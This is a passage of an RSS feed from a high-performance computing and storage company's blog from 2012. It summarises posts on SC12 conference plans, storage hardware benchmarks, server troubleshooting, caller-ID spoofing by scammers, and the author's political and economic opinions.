      <link>https://blog.scalability.org/2012/11/controversy-in-the-kernel/</link>
      <pubDate>Sun, 18 Nov 2012 17:26:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/controversy-in-the-kernel/</guid>
      <description>Referring to this article, it appears that there is some issue with an important subsystem in the Linux kernel. The SCSI target code, specifically the new implementation pulled in by James Bottomley is the LIO framework based upon work of Nicolas Bellinger and Rising Tide Systems. This was chosen over the SCST implementation, which continues to soldier on. We did have a dog in that race, and would have preferred to have seen SCST included due to our familiarity with it.</description>
    </item>
    
    <item>
      <title>Post SC12:  some thoughts and updates</title>
      <link>https://blog.scalability.org/2012/11/post-sc12-some-thoughts-and-updates/</link>
      <pubDate>Sun, 18 Nov 2012 05:52:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/post-sc12-some-thoughts-and-updates/</guid>
      <description>That was our best SCxy show. Ever. Inclusive of all 17-ish years I&amp;rsquo;ve attended (getting to be something of a geezer I guess). The 60 bay JackRabbit system got lots of attention. That we are putting the Calxeda backplane and energy cards in, come January time frame, brought many people in to talk about this. Big data was one of the huge topics. I&amp;rsquo;ve been saying Big Data is not just Hadoop.</description>
    </item>
    
    <item>
      <title>SC12 panel on big data</title>
      <link>https://blog.scalability.org/2012/11/sc12-panel-on-big-data/</link>
      <pubDate>Sat, 17 Nov 2012 16:36:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/sc12-panel-on-big-data/</guid>
      <description>Listen to their definition between 3 and 6 minutes in.
The storage performance, IO performance, and networking are extraordinarily critical to these problems. Which has been the set of problems we&amp;rsquo;ve been focusing on for a long time. Also worth noting that Addison Snell nails it on HPC and big data relationships. They are debating definitions and other aspects, but at the end of the day, the idea is that HPC has been a set of techniques, designs, and platforms upon which we&amp;rsquo;ve been banging on big data problems for decades.</description>
    </item>
    
    <item>
      <title>And its over till SC13 ...</title>
      <link>https://blog.scalability.org/2012/11/and-its-over-till-sc13/</link>
      <pubDate>Fri, 16 Nov 2012 06:58:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/and-its-over-till-sc13/</guid>
      <description>Upfront: This was the best SC conference we have ever participated in, in terms of interest level, traffic level, and various meetings with partners, customers, and others. And to the folks who might be reading this whom we missed, or whose conversations we had to cut short due to timing, please feel free to call/email us. We are reachable via the usual methods. Everyone marveled at the 60 bay chassis. Oddly enough, I never had time to set up the benchmarks on it.</description>
    </item>
    
    <item>
      <title>SC12 day 1</title>
      <link>https://blog.scalability.org/2012/11/5504/</link>
      <pubDate>Wed, 14 Nov 2012 06:33:56 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/5504/</guid>
      <description>Ok, beobash rocked. As usual, Lara at Xandmarketing and Doug Eadline did an absolutely awesome job. For those I bumped into, hello again. I apologize if I didn&amp;rsquo;t spend more time with you &amp;hellip; especially my readers &amp;hellip; I was operating on fumes at that point. Please don&amp;rsquo;t hesitate to introduce yourself during the day at the booth (4154) at SC12. Got up early, got into the booth, did an interview video with Rich B at InsideHPC.</description>
    </item>
    
    <item>
      <title>On the test track:  New JackRabbit, open the throttle wide ...</title>
      <link>https://blog.scalability.org/2012/11/on-the-test-track-new-jackrabbit-open-the-throttle-wide/</link>
      <pubDate>Wed, 07 Nov 2012 06:53:05 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/on-the-test-track-new-jackrabbit-open-the-throttle-wide/</guid>
      <description>I know, I know, I really should wait until the drive build is done. I know I should do that.
[root@Mjölnir ~]# df -h
Filesystem      Size  Used Avail Use% Mounted on
/dev/md0         89G  6.8G   77G   9% /
tmpfs           127G     0  127G   0% /dev/shm
/dev/sdc         48T  393G   47T   1% /data/3
/dev/sdb         48T  395G   47T   1% /data/2
/dev/sdd         33T  367G   33T   2% /data/4
/dev/sda         48T  374G   47T   1% /data/1
I called it Mjölnir.</description>
    </item>
    
    <item>
      <title>The joys of running one&#39;s own mail server</title>
      <link>https://blog.scalability.org/2012/11/the-joys-of-running-ones-own-mail-server/</link>
      <pubDate>Mon, 05 Nov 2012 23:41:24 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/the-joys-of-running-ones-own-mail-server/</guid>
      <description>Minor issue. We changed IP addresses at work recently. A larger block of public facing IPs for more functionality. And in doing so, we updated almost everything correctly. Yes, almost everything. Almost. Everything. The one, minor &amp;hellip; trivial &amp;hellip; thing we left unchanged &amp;hellip; broke our support site&amp;rsquo;s ability to send reply emails correctly. They were rejected about 50% of the time, as they came in on the wrong port/ip. So for the last week we&amp;rsquo;ve been sending extra emails.</description>
    </item>
    
    <item>
      <title>Heavily armed rabbits</title>
      <link>https://blog.scalability.org/2012/11/heavily-armed-rabbits/</link>
      <pubDate>Mon, 05 Nov 2012 19:40:07 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/heavily-armed-rabbits/</guid>
      <description>Saw this blog post with a cartoon in it.
[ ](http://www.rscottillustration.com/image/lucky-rabbits-foot)
Those are armed rabbits. Sorta like JackRabbits. And that might not be the only definition of &amp;ldquo;ARMed&amp;rdquo; out there. Heavily ARMed JackRabbits. Not that I&amp;rsquo;m hinting at anything. Maybe people should just visit our booth 4154 at #SC12 &amp;hellip;</description>
    </item>
    
    <item>
      <title>On the dangers of economic prognostication, and presidential elections</title>
      <link>https://blog.scalability.org/2012/11/on-the-dangers-of-economic-prognostication-and-presidential-elections/</link>
      <pubDate>Fri, 02 Nov 2012 18:22:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/on-the-dangers-of-economic-prognostication-and-presidential-elections/</guid>
      <description>is drinking your own koolaid, consuming your own product, believing the wishful thinking that underlies your most serious predictions. Like this. Just like in catastrophic AGW, there&amp;rsquo;s one single chart that belies all the claims as to how &amp;ldquo;well&amp;rdquo; the &amp;ldquo;stimulus&amp;rdquo; package did. It&amp;rsquo;s a damning chart. Here it is.
[ ](http://www.aei-ideas.org/2012/11/is-this-as-good-as-it-gets-novembers-dismal-new-normal-jobs-report/)
And worse, if you look at how the recovery compares to others &amp;hellip; its not going very well at all.</description>
    </item>
    
    <item>
      <title>Where I come from ...</title>
      <link>https://blog.scalability.org/2012/11/where-i-come-from/</link>
      <pubDate>Fri, 02 Nov 2012 03:35:58 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/11/where-i-come-from/</guid>
      <description>&amp;hellip; this is called being a mensch. Well played Michael Ferns, well played (in a respectful way). And welcome to Michigan and the Wolverines.</description>
    </item>
    
    <item>
      <title>Fads, waves of the future, etc.</title>
      <link>https://blog.scalability.org/2012/10/fads-waves-of-the-future-etc/</link>
      <pubDate>Thu, 01 Nov 2012 00:51:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/fads-waves-of-the-future-etc/</guid>
      <description>Fads are standing waves of marketing/sales/technology that have limited lifetimes, yet generate buzz. Fads die out, and they consume resources during their existence. Fads rarely ever do more than help cull the herd &amp;hellip; assisting evolutionary processes that weed out crappy technology dressed up nicely and packaged for sale. The best example of these I can come up with is the cycle-stealing codes that turned your machine into a &amp;ldquo;supercomputer&amp;rdquo; by aggregating cycles across many hundreds and thousands of machines.</description>
    </item>
    
    <item>
      <title>Not good</title>
      <link>https://blog.scalability.org/2012/10/not-good-2/</link>
      <pubDate>Wed, 31 Oct 2012 01:11:10 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/not-good-2/</guid>
      <description>Rich B at InsideHPC.com posts about the national labs&amp;rsquo; exit from floorspace at SC12. The claim is that it is due to budget cuts, but the GSA scandal and its fallout likely weigh more heavily with the upper echelon of decision makers. Which, if you think about it even a minute amount, you realize is the very definition of the cliche about cutting one&amp;rsquo;s nose off to spite one&amp;rsquo;s face. To any decision makers out there, this is the wrong thing to do.</description>
    </item>
    
    <item>
      <title>Ultradense and fast JackRabbit coming next week</title>
      <link>https://blog.scalability.org/2012/10/ultradense-and-fast-jackrabbit-coming-next-week/</link>
      <pubDate>Tue, 30 Oct 2012 03:22:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/ultradense-and-fast-jackrabbit-coming-next-week/</guid>
      <description>I don&amp;rsquo;t know that we&amp;rsquo;ll be able to get enough 4TB drives for all the units. We&amp;rsquo;ll talk about it some more at SC12, and should have a few units with 4TB, 3TB, and possibly 2TB drives in them. For those who aren&amp;rsquo;t aware, our JackRabbit unit is already the fastest spinning-disk single server that we are aware of in the market. It&amp;rsquo;s dense, up to 144TB in a 5U container.</description>
    </item>
    
    <item>
      <title>On the money</title>
      <link>https://blog.scalability.org/2012/10/on-the-money/</link>
      <pubDate>Sun, 28 Oct 2012 01:46:46 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/on-the-money/</guid>
      <description>Charles Stross (@cstross) is one of my favorite writers. We have wildly different views on things, but I like his writing, his very clear thinking, and his storytelling. Which is why I have to say that this blog post puts a nice context box around some of the things we hear about &amp;ldquo;saving the planet.&amp;rdquo; Something akin to this has been running around my head for a while, but not nearly as elegantly put.</description>
    </item>
    
    <item>
      <title>Oh joy ... a crash on our Amazon EC2 hosted web server</title>
      <link>https://blog.scalability.org/2012/10/oh-joy-a-crash-on-our-amazon-ec2-hosted-web-server/</link>
      <pubDate>Mon, 22 Oct 2012 18:58:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/oh-joy-a-crash-on-our-amazon-ec2-hosted-web-server/</guid>
      <description>[update 2] Yuppers, Amazon US East N. Virginia is experiencing issues. C.f. here.
Doug thought I did this with our IP update (larger block of static). So did I for a moment, until I logged in. Partial failure on my part for not having the backup live/ready. Will remedy over the next day or two.
 [update] I think we can call this one a #fail.
Imagine if some small business with no technical acumen, sold on the &amp;ldquo;push this button to run your website&amp;rdquo; saw that error message.</description>
    </item>
    
    <item>
      <title>Interesting post on macroeconomic trends, risk, investment, and farms</title>
      <link>https://blog.scalability.org/2012/10/interesting-post-on-macroeconomic-trends-risk-investment-and-farms/</link>
      <pubDate>Sun, 21 Oct 2012 18:54:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/interesting-post-on-macroeconomic-trends-risk-investment-and-farms/</guid>
      <description>Saw this linked from zerohedge. Understand that, to a degree, this is a sales pitch for this person&#39;s new fund. But the reasoning behind doing what they are doing is fascinating to me. Along with a description of what happened to the global financial markets.
Definitely worth the view just for the history and an analysis of macroeconomic trends.</description>
    </item>
    
    <item>
      <title>When you&#39;ve lost Dilbert ...</title>
      <link>https://blog.scalability.org/2012/10/when-youve-lost-dilbert/</link>
      <pubDate>Sun, 21 Oct 2012 00:05:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/when-youve-lost-dilbert/</guid>
      <description>&amp;hellip; the game may be over. Ok, this is a very well written, and extremely cogent argument. Scott Adams, creator of Dilbert, indicated why he&amp;rsquo;s not supporting Obama, and is endorsing Romney in the US Presidential election. His reasons boil down to a firing offense Mr. Obama committed (in Adams&#39; opinion). More specifically, he indicates that he doesn&amp;rsquo;t like lots of Romney&amp;rsquo;s positions, but Romney hasn&amp;rsquo;t committed this particular offense. And specifically to the point of competence, Adams gets that Romney is a turn-around guy.</description>
    </item>
    
    <item>
      <title>AMD has an SGI moment</title>
      <link>https://blog.scalability.org/2012/10/amd-has-an-sgi-moment/</link>
      <pubDate>Thu, 18 Oct 2012 20:35:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/amd-has-an-sgi-moment/</guid>
      <description>$131M quarterly loss. They have a looming 15% (think one out of every seven) RIF. I remember those from SGI days. I remember being on an ACS show floor, giving demos, and learning that some of my colleagues on the show floor with me were part of the RIF. SGI itself isn&amp;rsquo;t doing well, but that&amp;rsquo;s a story for another time. Still have lots of friends at AMD. Folks I&amp;rsquo;ve worked with and respect highly.</description>
    </item>
    
    <item>
      <title>Initial plans for SC12</title>
      <link>https://blog.scalability.org/2012/10/initial-plans-for-sc12/</link>
      <pubDate>Thu, 18 Oct 2012 18:06:25 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/initial-plans-for-sc12/</guid>
      <description>Assuming all the hardware is ready &amp;hellip; not sure, but hopefully it will be. We&amp;rsquo;ll have a siCluster at the booth. Powered by partner&amp;rsquo;s 10/40GbE fabric, and running a few different cluster file systems. FhGFS is a no brainer, it will be on there. Ceph should be on there. GlusterFS should be on there. Thinking about Lustre, may do this via our presentation layer, so we can avoid dealing with the pain of hyperspecialized kernels, and specific hard distro revision requirements.</description>
    </item>
    
    <item>
      <title>Beta version of FhGFS: now with mirror capability!</title>
      <link>https://blog.scalability.org/2012/10/beta-version-of-fhgfs-now-with-mirror-capability/</link>
      <pubDate>Thu, 18 Oct 2012 17:50:33 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/beta-version-of-fhgfs-now-with-mirror-capability/</guid>
      <description>One of the best parallel file systems just got better. FhGFS now has content mirroring (client and server side!) as well as other nice improvements! We&amp;rsquo;ve used the preceding release on our siFlash unit. I&amp;rsquo;ve not shared the results publicly to date, but suffice it to say that the performance was absolutely stellar (it helps that siFlash is the fastest 4U SSD/Flash tightly coupled computing and storage array in market). We are planning out our SC12 booth now.</description>
    </item>
    
    <item>
      <title>testing again</title>
      <link>https://blog.scalability.org/2012/10/testing-again/</link>
      <pubDate>Thu, 18 Oct 2012 17:18:13 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/testing-again/</guid>
      <description>hopefully it works this time &amp;hellip;</description>
    </item>
    
    <item>
      <title>Interesting and depressing article on Michigan&#39;s future</title>
      <link>https://blog.scalability.org/2012/10/interesting-and-depressing-article-on-michigans-future/</link>
      <pubDate>Thu, 18 Oct 2012 05:12:23 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/interesting-and-depressing-article-on-michigans-future/</guid>
      <description>A few prefaces &amp;hellip; First, I disagree with the premise throughout this article that our governor is timid. He is, IMO, and in many people&amp;rsquo;s opinion, doing a great job. Governor Romney is very similar to Governor Snyder in many ways. Timidity really isn&amp;rsquo;t apparent. I guess that people see someone making a cost-benefit analysis for engaging in a particular debate, or pushing for a particular outcome, and deciding to forgo a particular fight, as being timid.</description>
    </item>
    
    <item>
      <title>Growth</title>
      <link>https://blog.scalability.org/2012/10/growth/</link>
      <pubDate>Wed, 17 Oct 2012 18:48:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/growth/</guid>
      <description>I&amp;rsquo;ve hinted a little at what&amp;rsquo;s going on, but I haven&amp;rsquo;t come fully clean yet. Will do soon. I promise, though likely it will be public after SC12. Suffice it to say that the company is on a track to grow significantly in the near term. No, this is neither a capital raise, nor an acquisition. We have a practical problem. We&amp;rsquo;ll be setting up an office in NJ/NY area to serve our customer base there, and we will need extremely good technical and support people, along with some of the other folks we plan to put there.</description>
    </item>
    
    <item>
      <title>Update on the scammers spoofing our number</title>
      <link>https://blog.scalability.org/2012/10/update-on-the-scammers-spoofing-our-number/</link>
      <pubDate>Wed, 10 Oct 2012 20:19:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/update-on-the-scammers-spoofing-our-number/</guid>
      <description>We&amp;rsquo;ve started following an interesting suggestion made to us. It involves some cost, but it&amp;rsquo;s got the nice side effect of providing us (eventually) with the call data records from the phone company. Assume we will be getting the information we need, soon, to deal with this. We have a potent legal cocktail waiting for this information. Of course, the scammers decided to step things up a bit. One claimed to be with the FBI.</description>
    </item>
    
    <item>
      <title>Updated configs for storage</title>
      <link>https://blog.scalability.org/2012/10/updated-configs-for-storage/</link>
      <pubDate>Tue, 02 Oct 2012 19:03:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/10/updated-configs-for-storage/</guid>
      <description>Had neglected to mention this, but all of the day job&amp;rsquo;s units support 4TB drives. This means you can get 4U goodness up to 96TB, 5U goodness up to 192TB, and very soon (and we&amp;rsquo;ll start taking early orders for it) 4U with up to (about) 1/4 PB directly coupled to a very fast computer, with incredible amounts of IO and network bandwidth. Full 42U rack with about 2.5PB raw, and about 40GB/s sustained streaming write, and 60GB/s sustained streaming read performance in aggregate.</description>
    </item>
    
    <item>
      <title>Scalable Informatics at SC12 in Salt Lake City</title>
      <link>https://blog.scalability.org/2012/09/scalable-informatics-at-sc12-in-salt-lake-city/</link>
      <pubDate>Fri, 28 Sep 2012 19:57:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/scalable-informatics-at-sc12-in-salt-lake-city/</guid>
      <description>Bigger booth this year, number 4154 (10x20) &amp;hellip; last year was WAY too cramped. Planning stuff &amp;hellip; keeping it simple if possible. Maybe a minirack with a siCluster &amp;hellip; thinking about this hard. Definitely a dense storage system, an insanely fast storage system. Probably some streaming stuff, and pounding on IO similar to what we did at HPC on Wall Street. Will probably have a few partners with us (and their bits) in the booth.</description>
    </item>
    
    <item>
      <title>memtest delenda est</title>
      <link>https://blog.scalability.org/2012/09/memtest-delenda-est/</link>
      <pubDate>Wed, 26 Sep 2012 20:45:06 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/memtest-delenda-est/</guid>
      <description>Ok &amp;hellip; maybe not so much destroyed. More like &amp;ldquo;ignored as a reasonable test of anything but DIMM visibility, and very basic functionality&amp;rdquo;. Memtest has several variants running around, all of which purport to hammer on, and detect, bad RAM. The only problem is, it doesn&amp;rsquo;t really work well, apart from trivial cases. That is, if you have iffy RAM, you&amp;rsquo;d need days/weeks/months of testing with this code, rather than putting it in a box and running a hard-pounding code on it.</description>
    </item>
    
    <item>
      <title>Achieved warp speed this year ...</title>
      <link>https://blog.scalability.org/2012/09/achieved-warp-speed-this-year/</link>
      <pubDate>Mon, 24 Sep 2012 16:23:14 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/achieved-warp-speed-this-year/</guid>
      <description>:D More soon. I promise.</description>
    </item>
    
    <item>
      <title>Response to the 11&#43; GB/s unit was ... incredible ...</title>
      <link>https://blog.scalability.org/2012/09/response-to-the-11-gbs-unit-was-incredible/</link>
      <pubDate>Mon, 24 Sep 2012 01:02:42 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/response-to-the-11-gbs-unit-was-incredible/</guid>
      <description>We showed two large speedometers, one with Bandwidth, one with IOPs. These measured their data right off the hardware (via the device driver and block subsystem mechanisms). First, we ran a fio test with 96 threads reading 1.1TB of data in total. This took about 100 seconds or so. Second, we ran a fio test with 384 threads randomly reading 8k chunks of data out of that 1.1TB. Left them in a loop, with a big speedometer pair on the screen.</description>
    </item>
    
    <item>
      <title>Tiburon again saves the day</title>
      <link>https://blog.scalability.org/2012/09/tiburon-again-saves-the-day/</link>
      <pubDate>Mon, 24 Sep 2012 00:40:53 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/tiburon-again-saves-the-day/</guid>
      <description>Useful code (i.e. code == program) has a tendency to save you lots of pain when other solutions fail you. Powerful code lets you do things that lesser codes mess up. Intelligently designed and written codes allow you to debug them, and their operational impacts, easily and quickly. None of these qualities describes grub. Grub is &amp;hellip; well &amp;hellip; grub. If you have to deal with it on a daily basis, you understand what I mean by this.</description>
    </item>
    
    <item>
      <title>turning siFlash past 10 (GB/s that is) ...</title>
      <link>https://blog.scalability.org/2012/09/turning-siflash-past-10-gbs-that-is/</link>
      <pubDate>Fri, 14 Sep 2012 06:17:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/turning-siflash-past-10-gbs-that-is/</guid>
      <description>Yeah, that title is a Spinal Tap homage. We are bringing a new siFlash unit to the HPC on Wall Street conference. This uses our new chassis, an updated kernel, and lots of tuning. Still have much more work to do &amp;hellip; but it&amp;rsquo;s probably good enough to ship now. I ran a few quick speed drills on it. 4.2 GB/s streaming write, and 10.7 GB/s streaming read with 96 simultaneous processes.</description>
    </item>
    
    <item>
      <title>IPMI Console Logger is born</title>
      <link>https://blog.scalability.org/2012/09/ipmi-console-logger-is-born/</link>
      <pubDate>Thu, 13 Sep 2012 02:06:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/ipmi-console-logger-is-born/</guid>
      <description>Here&amp;rsquo;s the problem I am trying to solve; call it a many-year itch I&amp;rsquo;ve been wanting to scratch. We build very high performance storage clusters, extreme performance flash and ssd arrays, and a number of other things. At customer sites, while in use, a unit could crash. When it does, we really need a full console log to see the full crash log. Unfortunately, the &amp;ldquo;write to the screen&amp;rdquo; method gets very &amp;hellip; very old when you are trying to transcribe something &amp;hellip; that&amp;rsquo;s happened to scroll off the screen.</description>
    </item>
    
    <item>
      <title>Not even wrong</title>
      <link>https://blog.scalability.org/2012/09/not-even-wrong/</link>
      <pubDate>Wed, 12 Sep 2012 03:33:45 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/not-even-wrong/</guid>
      <description>There&amp;rsquo;s a story about Wolfgang Pauli about how another physicist gave him a dubious paper to look over to get his opinion. Pauli, ever the critic, remarked about the paper something akin to this:
This is a way of saying that there are failures so deep, so fundamental, that one cannot get past them to deal with the basic issues of the underlying theory. If the fundamentals are off, there is no possible way that the theory could remain intact.</description>
    </item>
    
    <item>
      <title>slight change to site: comments</title>
      <link>https://blog.scalability.org/2012/09/slight-change-to-site-comments/</link>
      <pubDate>Sat, 08 Sep 2012 02:42:19 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/slight-change-to-site-comments/</guid>
      <description>We&amp;rsquo;ve been getting spammed. So I am now requiring comment submitters to have a previously allowed comment to be able to comment without issue. I hate doing this, but I don&amp;rsquo;t want this to become yet another waste of bits, lousy with comment spam. If this doesn&amp;rsquo;t work, I&amp;rsquo;ll change it to require user login to comment. [update] Since making the change, no spam has made it through, though they have tried.</description>
    </item>
    
    <item>
      <title>An avulsion fracture of 4th finger on left hand</title>
      <link>https://blog.scalability.org/2012/09/an-avulsion-fracture-of-4th-finger-on-left/</link>
      <pubDate>Fri, 07 Sep 2012 20:50:54 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/an-avulsion-fracture-of-4th-finger-on-left/</guid>
      <description>This is what I get for sparring with 13 year old black belts &amp;hellip; sigh &amp;hellip; starting to feel old :( Splint, ibuprofen, and no sparring for a while (could do 1 hand and 2 feet, but that requires a far larger ego than I have, not to mention some brass ones &amp;hellip; which I can&amp;rsquo;t say I have relative to my sparring abilities) . Probably can&amp;rsquo;t handle my bo either.</description>
    </item>
    
    <item>
      <title>OT:  A plea for help</title>
      <link>https://blog.scalability.org/2012/09/ot-a-plea-for-help/</link>
      <pubDate>Thu, 06 Sep 2012 20:59:51 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/ot-a-plea-for-help/</guid>
      <description>We have a problem. Some company has spoofed our telephone number for their caller ID, and has been calling up people, harassing and threatening them. We get calls from many very pissed off people, and I have to explain the situation to them. Usually it&amp;rsquo;s one per week. We took 5-6 calls about this, just today. Ok. Gotta stop this. The folks doing this are dragging our name through the mud every time they do this, as they are misrepresenting themselves as us by using our phone number.</description>
    </item>
    
    <item>
      <title>[updated at bottom] Apparently there are people this profoundly ... well ... see for your self</title>
      <link>https://blog.scalability.org/2012/09/apparently-there-are-people-this-profoundly-well-see-for-your-self/</link>
      <pubDate>Thu, 06 Sep 2012 12:55:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/apparently-there-are-people-this-profoundly-well-see-for-your-self/</guid>
      <description>At first I was ready to discount this as &amp;ldquo;entrapment&amp;rdquo; or something like gonzo journalism. But &amp;hellip; it&amp;rsquo;s &amp;hellip; not &amp;hellip; A plain and simple question, nothing complex. Should we ban corporate profits? What is astounding, or horrifying, is the location where it is being asked, and the seemingly normal people happily espousing what is basically a ridiculous concept.
Here is my take on this. First off, Peter Schiff is something of a notorious guy.</description>
    </item>
    
    <item>
      <title>Going over some old records</title>
      <link>https://blog.scalability.org/2012/09/going-over-some-old-records/</link>
      <pubDate>Thu, 06 Sep 2012 04:58:03 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/going-over-some-old-records/</guid>
      <description>&amp;hellip; and I ran across a situation where we helped out a customer, and we were screwed over after they decided not to pay a part of their bill. They don&amp;rsquo;t deny they owed it. They just didn&amp;rsquo;t want to pay it. And the hard part: since they were out of the country, in a different jurisdiction, there was little we could do. This is part of bleeding when you build a business.</description>
    </item>
    
    <item>
      <title>Excellent read on statistics and how people misuse it</title>
      <link>https://blog.scalability.org/2012/09/excellent-read-on-statistics-and-how-people-misuse-it/</link>
      <pubDate>Mon, 03 Sep 2012 01:38:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/09/excellent-read-on-statistics-and-how-people-misuse-it/</guid>
      <description>Link is here. I cannot tell you how many times I&amp;rsquo;ve had a conversation with a researcher, when we talk about statistics, and they quote me some high correlation coefficient as being evidence of causality. Any physical scientist, chemist, engineer, &amp;hellip; knows that you have to treat correlation coefficients very carefully, and you cannot substitute these for a real causal relationship with a backing theory that provides a testable model. That is, the causal relationship is fundamentally an aspect of the theory, with the latter able to guide you on making predictions.</description>
    </item>
    
    <item>
      <title>I had a sense this would work out well</title>
      <link>https://blog.scalability.org/2012/08/i-had-a-sense-this-would-work-out-well/</link>
      <pubDate>Fri, 31 Aug 2012 06:16:50 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/i-had-a-sense-this-would-work-out-well/</guid>
      <description>As I noted in an earlier post Joyent had discontinued an aging service, but one which many people had bought into, with the promise of &amp;ldquo;forever&amp;rdquo; service. I pointed out that in this sense, forever couldn&amp;rsquo;t mean, in a literal sense, forever &amp;hellip; But I had suggested as well that they would likely try to find a way to make a transition better for people. And they did.
This is a perfect illustration of how to handle these transitions.</description>
    </item>
    
    <item>
      <title>Brittle, poorly designed pipelines</title>
      <link>https://blog.scalability.org/2012/08/brittle-poorly-designed-pipelines/</link>
      <pubDate>Thu, 30 Aug 2012 21:35:27 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/brittle-poorly-designed-pipelines/</guid>
      <description>One of the more powerful aspects of cluster and cloud computing is the effective requirement for building in fault tolerance of some sort, to a computational pipeline. You have to assume, in a wide computation scenario, that some aspect of your system may become unavailable. Which means you need a sane way to save state at critical points in your workflow. You need sane distribution and management of the workflow. You need to be able to route around errors.</description>
    </item>
    
    <item>
      <title>Two &#34;new&#34; projects</title>
      <link>https://blog.scalability.org/2012/08/two-new-projects/</link>
      <pubDate>Wed, 29 Aug 2012 23:44:30 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/two-new-projects/</guid>
      <description>Hyperspace and 26. One does something wholly unholy, and the other takes our significant advantage in a particular area and makes it &amp;hellip; well &amp;hellip; even more of an advantage. Hyperspace may be with us at HPC on Wall Street. Working on it with our partner in &amp;hellip; er &amp;hellip; alternative dimensions. Yeah. That&amp;rsquo;s the ticket! Assuming everything works out, you will hear about 26 before SC12, and probably see a few there.</description>
    </item>
    
    <item>
      <title>SmartOS now booting from Tiburon</title>
      <link>https://blog.scalability.org/2012/08/smartos-now-booting-from-tiburon/</link>
      <pubDate>Mon, 27 Aug 2012 22:06:00 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/smartos-now-booting-from-tiburon/</guid>
      <description>Ok &amp;hellip; took a little bit of hacking on Tiburon to add a capability I had long wanted. And it&amp;rsquo;s not completely doing things the SmartOS way &amp;hellip; but it works for the moment.
[ ](/images/SmartOS-booted-from-Tiburon.png)
Have some additional testing to do, drivers to test, yadda yadda yadda. But the message should be clear. We can boot SmartOS from Tiburon (Scalable Informatics siCluster Storage and Computing cluster infrastructure).</description>
    </item>
    
    <item>
      <title>A code to measure IOPs/Bandwidth</title>
      <link>https://blog.scalability.org/2012/08/a-code-to-measure-iopsbandwidth/</link>
      <pubDate>Fri, 24 Aug 2012 04:44:47 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/a-code-to-measure-iopsbandwidth/</guid>
      <description>Many testing codes for storage systems report various values, by shoving IO down the pipe, and measuring amount shoved, and interval between the first IO call and &amp;ldquo;end&amp;rdquo; of last IO call. This is all well and good for some cases, but caching and many other effects get in the way of accurate measurement. Systems eventually settle down to an approximate state with small perturbations around this state. The problem is that most tools don&amp;rsquo;t quite report this.</description>
    </item>
    
    <item>
      <title>I see benchmarketing back in full swing</title>
      <link>https://blog.scalability.org/2012/08/i-see-benchmarketing-back-in-full-swing/</link>
      <pubDate>Fri, 24 Aug 2012 02:17:26 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/i-see-benchmarketing-back-in-full-swing/</guid>
      <description>I&amp;rsquo;ve read quite a few storage press releases talking about how &amp;ldquo;product X is capable of performance Y and IOPs Z.&amp;rdquo; I also notice that they didn&amp;rsquo;t say &amp;ldquo;we measured this, this way, and this is what we found.&amp;rdquo; I wonder why. I look at it this way, if we reported numbers the way lots of these folks report numbers, our JackRabbit JR5 machine would have a bandwidth of 6.2GB/s read and 5GB/s write.</description>
    </item>
    
    <item>
      <title>Rereading posts from 6 years ago ...</title>
      <link>https://blog.scalability.org/2012/08/rereading-posts-from-6-years-ago/</link>
      <pubDate>Wed, 22 Aug 2012 05:10:01 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/rereading-posts-from-6-years-ago/</guid>
      <description>NFS sucked then as well. We&amp;rsquo;ve got a customer who occasionally pushes their hardware a wee bit too hard. And stuff comes crashing down. Basically it looks like a kernel bug, one I&amp;rsquo;ve not been able to ID for a number of reasons, and I can&amp;rsquo;t find a mechanism to reliably tickle it. This is the definition of a Heisenbug. Basically the problem is this. They use NFS, extensively. NFS is great for low level IO rates.</description>
    </item>
    
    <item>
      <title>started playing with SmartOS for the day job</title>
      <link>https://blog.scalability.org/2012/08/started-playing-with-smartos-for-the-day-job/</link>
      <pubDate>Wed, 22 Aug 2012 03:47:22 +0000</pubDate>
      
      <guid>https://blog.scalability.org/2012/08/started-playing-with-smartos-for-the-day-job/</guid>
